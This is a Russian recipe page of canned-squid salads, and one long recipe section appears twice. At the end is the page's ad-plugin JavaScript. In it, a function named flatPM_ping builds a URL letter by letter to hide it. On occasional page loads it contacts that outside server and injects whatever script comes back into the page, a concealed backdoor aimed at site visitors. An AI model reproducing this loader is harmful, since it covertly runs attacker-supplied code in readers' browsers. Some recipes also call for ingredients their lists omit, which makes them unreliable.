Салат из консервированных кальмаров

Салат из консервированных кальмаров: быстрые понятные рецепты

На праздники любая хозяйка мечтает удивить домочадцев и гостей какими-нибудь изысканными, легкими закусками, подыскивая интересные рецепты. Салат из консервированных кальмаров — прекрасное решение этой проблемы. Он отличается нежным пряным вкусом, необычным составом, легкостью приготовления.

Банку с кальмарами очень просто найти на полках любого магазина, а доступность ингредиентов удивит любую экономную домохозяйку. Можно добавлять в салат кукурузу, сыр, горошек, огурчики, лук, комбинируя состав по собственному желанию. С каждым разом вкус будет меняться в зависимости от добавленных продуктов, овощей, специй.

Рецепт салата с кальмарами, горошком и морковью

Готовый салат из консервированных кальмаров обладает приятным пряным вкусом благодаря добавлению маринованных огурчиков и горошка. Вареная морковь придает ему небольшую сладковатую нотку, а картофель с майонезом добавляют сытности. Выложенный в красивый стеклянный салатник, он послужит украшением семейного или праздничного стола.

  • маленькая баночка зеленого горошка;
  • 300 грамм консервированных кальмаров;
  • 3 небольших маринованных огурца, можно взять соленые;
  • 2 морковины;
  • 3 средних картошины;
  • соль, майонез и специи по желанию.
  1. Вначале нужно вымыть клубни картофеля, морковь, залить водой, отварить, остудить.
  2. Нарезаем кубиками морковь, картофель.
  3. Огурцы натираем на крупной терке, кальмары режем толстой соломкой.
  4. Смешиваем все в миске, добавляем горошек.
  5. Перемешиваем с майонезом, не забыв посолить, поперчить для остроты.
  1. Чтобы слить воду из банки с горошком, следует высыпать содержимое в дуршлаг, дать постоять две минутки.
  2. Картофель лучше не переваривать, иначе при размешивании он превратится в кашу, придав блюду невзрачный вид.
  3. Майонез в этот салат нужно добавлять уже перед подачей на стол.

Рецепт салата с кальмарами, сыром и соленым огурцом

Такой салат очень быстро готовиться, буквально за 10 минут. Соленые огурцы и зеленый лук придают ему остроты, а кальмары с яйцом — легкости. Благодаря заправке из масла блюдо не выглядит жирным, можно готовить его даже во время диеты. Необычный вкус будет оценен и гостями, и родными.

  • банка консервированных кальмаров весом 170 грамм;
  • маленькая луковица, лучше взять красную;
  • пучок зеленого лука перьями;
  • соленый или маринованный огурец среднего размера;
  • 1 вареное яйцо;
  • 100 грамм любого твердого сыра;
  • оливковое масло для заправки.
  1. Кальмары режем небольшими кусочками.
  2. Красный лук измельчаем на мелкие частички, зеленый — на маленькие кружочки.
  3. Огурец натираем в крупную терку, то же самое делаем с яйцом.
  4. Сыр нужно нарезать кубиками небольшого размера.
  5. Выкладываем все в блюдо, добавляем пару ложек оливкового масла, если требуется — соль, аккуратно перемешиваем.
  1. При желании оливковое масло можно заменить майонезом, салат получится более сочным и питательным.
  2. Несмазанные нарезанные продукты можно недолго хранить в холодильнике до прихода гостей.

Рецепт слоеного салата с кальмарами

  • 200 грамм консервированных кальмаров;
  • свежий огурец;
  • 3 яйца;
  • маленькая баночка кукурузы;
  • 50 грамм сыра;
  • 6 штучек крабовых палочек;
  • майонез, соль.
  1. Колечки кальмаров нарезаем небольшими кусочками.
  2. Огурец желательно натереть на терке или мелко порезать ножом.
  3. Яйца следует отварить и измельчить в тарелке вилкой, смешать с майонезом.
  4. Сыр нужно натереть на терке тонкими стружками.
  5. Крабовые палочки надо разморозить и порезать на мелкие дольки.
  6. Салат выкладываем слоями: кальмары, огурец, яйца, кукуруза, крабовые палочки. Каждый слой промазываем сверху с помощью вилки майонезом, готовое блюдо посыпаем сыром.
  1. Для пропитки слоев можно поместить готовое блюдо на час в холодильник.
  2. Сверху салат можно украсить зеленью, половинками оливок.
  3. При желании разрешается добавить слой зеленого горошка.

Рецепт салата с кальмарами и кукурузой

Сладкая кукуруза и сыр придают салату из консервированных кальмаров сладковатый нежный вкус, а зеленый лук добавляет остроты. Такую закуску можно приготовить, если гости пришли неожиданно для хозяйки.

  • 200 грамм консервированных кальмаров кольцами;
  • банка кукурузы;
  • 100 грамм твердого сыра;
  • 3 куриных яйца;
  • луковица;
  • соль, майонез.
  1. Колечки кальмара нужно разрезать на четвертинки, если небольшие — на половинки.
  2. Луковицу следует очистить и ошпарить кипятком, чтобы не горчила. Затем надо разрезать ее на мелкие кусочки.
  3. Из банки с кукурузой нужно слить воду.
  4. Яйца лучше отварить заранее, остудить, очистить и натереть на терке.
  5. Сыр можно натереть или мелко порезать ножом в виде тонких соломинок.
  6. Чтобы сделать салат, остается только смешать все продукты, добавив соль с майонезом.
  1. Чтобы вареные яйца лучше было очистить, после варки следует поместить их в холодную воду.
  2. Сыр надо брать самых твердых сортов.
  3. Лучше перед подачей немного охладить блюдо, поставив ненадолго в холодильник.

Рецепт салата с консервированными кальмарами и сыром

Если хочется чего-то легкого и нежного, этот салат оправдает все ожидания. Благодаря специям он имеет немного пряный приятный вкус, кальмары же с сыром добавляют сытности. Чтобы приготовить это вкусное угощение, достаточно нарезать продукты и выложить в салатник.

  • банка консервированных кальмаров;
  • 150 грамм сыра;
  • 3 яйца;
  • луковичка;
  • соль, майонез, перец.
  1. Кальмаров надо порезать соломкой острым ножом.
  2. Яйца следует сварить вкрутую, очистить и мелко порезать или натереть.
  3. Луковицу можно нарезать полукольцами.
  4. Сыр надо натереть на крупной терке соломкой.
  5. Затем нужно перемешать все приготовленные продукты с майонезом, посолить и поперчить, после этого переложить салатник в красивую тарелку или фужеры.
  1. Обычный майонез можно заменить низкокалорийным, при желании легко сделать заправку из сметаны, смешав ее с перцем и ложкой горчицы.
  2. Вместо репчатого рекомендуется брать красный лук, он меньше горчит.
  3. Можно выложить салат в тарталетки, украсить листиками петрушки.

Все салаты с консервированными кальмарами имеют нежный вкус, в зависимости от задумки хозяйки могут состоять из разных продуктов. Делаются они легко и быстро, причем и съедают их за мгновение, прося добавки. Такие рецепты всегда выручат при неожиданном приходе гостей, не позволяя ударить в грязь лицом. Стоит попробовать приготовить их все, чтобы выбрать для себя самый вкусный.

Вкусный рецепт салата с консервированными кальмарами

Это блюдо имеет удивительный, нежный, немного пикантный вкус, который отличает его от классического варианта. Для праздничного события можно приготовить отличный вкусный салат из консервированных кальмаров, пошаговый рецепт с фото которого мы представляем. Простота готовки и доступность ингредиентов, позволит баловать близких таким аппетитным кушаньем частенько.

Мягкий, легкий салат с консервированными кальмарами оценят на любом столе по достоинству. Такая вкуснятина исчезнет из салатницы самой первой. Важно помнить, что салаты из морепродуктов никогда на долго не задерживаются на столе, этот кулинарный шедевр не исключение.

Как приготовить салат из консервированных кальмаров

Этот пошаговый фото-рецепт поможет вам приготовить простой и самый вкусный салат из консервированных кальмаров. От классического варианта, к которому мы так привыкли наш салатик отличается наличием заправки и использованием консервов из кальмаров.

Ингредиенты

  • Консервированные кальмары – 150 гр.
  • Яйцо 1 категории – 3 шт.
  • Крупный картофель – 2 клубня
  • Плавленый сырок – 1 шт.
  • Свежий огурец – 80 гр.
  • Лук – 1/2 головки
  • Чеснок – 2 зубца
  • Зелень укропа – по вкусу
  • Майонез – 100 гр.
  • Соль – по вкусу.

Приготовление вкусного салата с консервированными кальмарами, яйцом и огурцом

Шаг 1.

Взять глубокую миску. Плавленый сырок порезать кубиками.

Шаг 2.

Отваренный до полной готовности картофель нашинковать квадратиками и переложить в миску.

Шаг 3.

Очень мелко порезать лук, чем мельче нарежете лук, тем лучше. Хорошенько измельчить отваренные яйца.

Совет к рецепту:

Чтобы избавится от лишней горечи, можно сбрызнуть лук соком лимона.

Шаг 4.

Нашинковать небольшими кусочками вымытый огурец. Консервированные кальмары порезать произвольными кусочками.

Шаг 5.

Далее необходимо приготовить заправку для простого салата из консервированных кальмаров. В миску с майонезом добавить натертый на терке чеснок и порезанный мелко укроп.

Шаг 6.

Хорошенько все перемешать до однородной массы.

Шаг 7.

Готовую заправку вылить в миску со всеми продуктами.

Добавить немного соли.

Очень тщательно все перемешать.

Аппетитный салат из консервированных кальмаров, яиц и огурца можно подавать на стол. Приятного аппетита!

Готовим салаты из консервированных кальмаров!

Вы избегаете блюд из кальмаров только потому, что готовить эти продукты сложно? Сегодня на прилавках магазинов можно найти баночки с консервированными кальмарами, и, поверьте, приготовить из них вкусный и полезный салат будет достаточно просто. Сайт о похудении DietaClub рад предложить вам несколько рецептов салата с консервированными кальмарами, которые подойдут, как для ужина в выходной день, так и для праздничной вечеринки. Попробуйте!

Сытный салат из консервированных кальмаров

Для приготовления такого салата из консервированных кальмаров понадобятся самые обычные продукты. А результатом станет блюдо, которое порадует вас и ваших близких неповторимым и богатым вкусом.

  • 250 грамм консервированных кальмаров;
  • 400 грамм зеленого горошка;
  • 100 грамм соленых огурцов;
  • 100 грамм сметаны;
  • оливки без косточек для украшения;
  • соль, перец, зелень.

Все ингредиенты нужно нарезать следующим образом:

  1. Кальмары — кольцами либо тонкой соломкой.
  2. Картофель — ломтиками или кубиками.
  3. Огурцы — соломкой.
  4. Зелень можно тонко нашинковать.

Теперь все продукты складываем в миску, добавляем к ним консервированный горошек, соль и сметану. Перемешиваем салат из консервированных кальмаров и украшаем его кружочками оливок.

Салат из кальмаров и яиц

Главное достоинство такого салата из консервированных кальмаров — нежный и мягкий вкус.

  • 200 грамм консервированных кальмаров;
  • 1 луковица;
  • 3 картофелины;
  • 2 яйца;
  • растительное масло;
  • соль, перец, зелень.

Картофель отвариваем, очищаем от кожицы и нарезаем небольшими кубиками. Измельчаем лук и обжариваем его в растительном масле. Отвариваем, очищаем и измельчаем яйца. Далее консервированные кальмары очищаем от пленки и нарезаем соломкой. Все продукты выкладываем в одну емкость, добавляем соль, перец, растительное масло и перемешиваем. Полученный салат из консервированных кальмаров украшаем кусочками вареных яиц и зеленью.

Салат из кальмаров «Юбилейный»

Кальмары очень хорошо сочетаются с самыми различными продуктами, поскольку не обладают слишком выраженным вкусом. Только представьте, каким необычным получится салат из этих морепродуктов, мяса и яблок!

  • 250 грамм консервированных кальмаров;
  • 250 грамм куриного мяса;
  • 300 грамм яблок (если у вас нет яблок, журнал о диетах DietaClub советует заменить их маринованными или свежими огурцами);
  • майонез или сметана для заправки;
  • 1 вареное яйцо;
  • 1 консервированный красный перец или помидор.
  • соль, перец, зелень.

Кальмары, мясо, яблоки (или огурцы) нарезаем кубиками и смешиваем с майонезом, солью и перцем. Полученный салат с консервированными кальмарами украшаем зеленью, кусочками помидоров либо перца и тертым вареным яйцом.

Кстати, если вы используете для приготовления блюда консервированного кальмара, его можно добавить в салат вместе с жидкостью, в которой он находился.

Салат из консервированных кальмаров и грибов

Грибы — это вкусный и дешевый продукт, который в сочетании с кальмаром может стать основой для замечательного салата.

  • 250 грамм свежих грибов;
  • 250 грамм консервированных кальмаров;
  • 6 картофелин;
  • 1 корень сельдерея;
  • майонез.

Отвариваем грибы (проще всего взять шампиньоны) и нарезаем их дольками. Отдельно варим картофель и сельдерей. После приготовления нарезаем их кубиками. Смешиваем все вышеперечисленные продукты с измельченными консервированными кальмарами (их можно нарезать соломкой), заправляем салат майонезом. Готово!

Салат из свежей капусты и консервированного кальмара

Многие салаты, которые мы предпочитаем готовить для праздничного стола, отличаются высокой калорийностью и жирностью. Но такой салат из консервированных кальмаров и свежей капусты будет абсолютно другим — легким, сытным, некалорийным и очень вкусным!

  • 1 банка консервированных кальмаров;
  • 100 грамм белокочанной капусты;
  • растительное масло;
  • 1 столовая ложка лимонного сока;
  • 1 чайная ложка сахара;
  • 2 веточки сельдерея;
  • соль, перец.

Сначала нужно тонко нашинковать капусту и перетереть ее с солью. Далее нарезаем соломкой кальмаров и смешиваем их с капустой. Добавляем сахар, лимонный сок, растительное масло и снова перемешиваем. Украшаем салат из консервированных кальмаров веточками сельдерея.

Салат из кальмаров с луком и яйцом

Этот необычный салат точно порадует вас богатством вкуса.

  • 1 банка консервированных кальмаров;
  • 4 яйца;
  • 2 луковицы;
  • растительное масло;
  • зеленый лук.

Сваренные вкрутую яйца и консервированные кальмары вместе с соком пропускаем через мясорубку. Репчатый лук измельчаем и пассируем до готовности в растительном масле. Все ингредиенты перемешиваем. Полученный салат из консервированных кальмаров украшаем мелко нарезанным зеленым луком. Заправлять его не нужно — репчатый лук при пассировке впитал в себя масло, а потому блюдо не получится безвкусным, скорее наоборот!

Салат с кальмарами, сыром и яблоками

Такой салат из консервированных кальмаров готовится за считанные минуты, ведь все необходимые продукты вы сможете найти в своем холодильнике!

  • 300 грамм кальмаров;
  • 3 яйца;
  • 50 грамм сыра;
  • 1 луковица;
  • майонез.

Нарезаем кальмары соломкой. Лук режем кольцами, заливаем его кипятком на 10 минут. Затем промываем его в холодной воде — после этих манипуляций лук не будет горчить. Натираем на средней терке яблоки, сыр, яйца. Смешиваем все ингредиенты — салат из консервированных кальмаров готов!

Журнал о похудении DietaClub надеется, что эти рецепты помогут вам разнообразить собственный рацион и приготовить действительно вкусные салаты!

Готовим салаты из консервированных кальмаров!

Вы избегаете блюд из кальмаров только потому, что готовить эти продукты сложно? Сегодня на прилавках магазинов можно найти баночки с консервированными кальмарами, и, поверьте, приготовить из них вкусный и полезный салат будет достаточно просто. Сайт о похудении DietaClub рад предложить вам несколько рецептов салата с консервированными кальмарами, которые подойдут, как для ужина в выходной день, так и для праздничной вечеринки. Попробуйте!

Сытный салат из консервированных кальмаров

Для приготовления такого салата из консервированных кальмаров понадобятся самые обычные продукты. А результатом станет блюдо, которое порадует вас и ваших близких неповторимым и богатым вкусом.

  • 250 грамм консервированных кальмаров;
  • 400 грамм зеленого горошка;
  • 100 грамм соленых огурцов;
  • 100 грамм сметаны;
  • оливки без косточек для украшения;
  • соль, перец, зелень.

Все ингредиенты нужно нарезать следующим образом:

  1. Кальмары — кольцами либо тонкой соломкой.
  2. Картофель — ломтиками или кубиками.
  3. Огурцы — соломкой.
  4. Зелень можно тонко нашинковать.

Теперь все продукты складываем в миску, добавляем к ним консервированный горошек, соль и сметану. Перемешиваем салат из консервированных кальмаров и украшаем его кружочками оливок.

Салат из кальмаров и яиц

Главное достоинство такого салата из консервированных кальмаров — нежный и мягкий вкус.

  • 200 грамм консервированных кальмаров;
  • 1 луковица;
  • 3 картофелины;
  • 2 яйца;
  • растительное масло;
  • соль, перец, зелень.

Картофель отвариваем, очищаем от кожицы и нарезаем небольшими кубиками. Измельчаем лук и обжариваем его в растительном масле. Отвариваем, очищаем и измельчаем яйца. Далее консервированные кальмары очищаем от пленки и нарезаем соломкой. Все продукты выкладываем в одну емкость, добавляем соль, перец, растительное масло и перемешиваем. Полученный салат из консервированных кальмаров украшаем кусочками вареных яиц и зеленью.

Салат из кальмаров «Юбилейный»

Кальмары очень хорошо сочетаются с самыми различными продуктами, поскольку не обладают слишком выраженным вкусом. Только представьте, каким необычным получится салат из этих морепродуктов, мяса и яблок!

  • 250 грамм консервированных кальмаров;
  • 250 грамм куриного мяса;
  • 300 грамм яблок (если у вас нет яблок, журнал о диетах DietaClub советует заменить их маринованными или свежими огурцами);
  • майонез или сметана для заправки;
  • 1 вареное яйцо;
  • 1 консервированный красный перец или помидор.
  • соль, перец, зелень.

Кальмары, мясо, яблоки (или огурцы) нарезаем кубиками и смешиваем с майонезом, солью и перцем. Полученный салат с консервированными кальмарами украшаем зеленью, кусочками помидоров либо перца и тертым вареным яйцом.

Кстати, если вы используете для приготовления блюда консервированного кальмара, его можно добавить в салат вместе с жидкостью, в которой он находился.

Салат из консервированных кальмаров и грибов

Грибы — это вкусный и дешевый продукт, который в сочетании с кальмаром может стать основой для замечательного салата.

  • 250 грамм свежих грибов;
  • 250 грамм консервированных кальмаров;
  • 6 картофелин;
  • 1 корень сельдерея;
  • майонез.

Отвариваем грибы (проще всего взять шампиньоны) и нарезаем их дольками. Отдельно варим картофель и сельдерей. После приготовления нарезаем их кубиками. Смешиваем все вышеперечисленные продукты с измельченными консервированными кальмарами (их можно нарезать соломкой), заправляем салат майонезом. Готово!

Салат из свежей капусты и консервированного кальмара

Многие салаты, которые мы предпочитаем готовить для праздничного стола, отличаются высокой калорийностью и жирностью. Но такой салат из консервированных кальмаров и свежей капусты будет абсолютно другим — легким, сытным, некалорийным и очень вкусным!

  • 1 банка консервированных кальмаров;
  • 100 грамм белокочанной капусты;
  • растительное масло;
  • 1 столовая ложка лимонного сока;
  • 1 чайная ложка сахара;
  • 2 веточки сельдерея;
  • соль, перец.

Сначала нужно тонко нашинковать капусту и перетереть ее с солью. Далее нарезаем соломкой кальмаров и смешиваем их с капустой. Добавляем сахар, лимонный сок, растительное масло и снова перемешиваем. Украшаем салат из консервированных кальмаров веточками сельдерея.

Салат из кальмаров с луком и яйцом

Этот необычный салат точно порадует вас богатством вкуса.

  • 1 банка консервированных кальмаров;
  • 4 яйца;
  • 2 луковицы;
  • растительное масло;
  • зеленый лук.

Сваренные вкрутую яйца и консервированные кальмары вместе с соком пропускаем через мясорубку. Репчатый лук измельчаем и пассируем до готовности в растительном масле. Все ингредиенты перемешиваем. Полученный салат из консервированных кальмаров украшаем мелко нарезанным зеленым луком. Заправлять его не нужно — репчатый лук при пассировке впитал в себя масло, а потому блюдо не получится безвкусным, скорее наоборот!

Салат с кальмарами, сыром и яблоками

Такой салат из консервированных кальмаров готовится за считанные минуты, ведь все необходимые продукты вы сможете найти в своем холодильнике!

  • 300 грамм кальмаров;
  • 3 яйца;
  • 50 грамм сыра;
  • 1 луковица;
  • майонез.

Нарезаем кальмары соломкой. Лук режем кольцами, заливаем его кипятком на 10 минут. Затем промываем его в холодной воде — после этих манипуляций лук не будет горчить. Натираем на средней терке яблоки, сыр, яйца. Смешиваем все ингредиенты — салат из консервированных кальмаров готов!

Журнал о похудении DietaClub надеется, что эти рецепты помогут вам разнообразить собственный рацион и приготовить действительно вкусные салаты!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};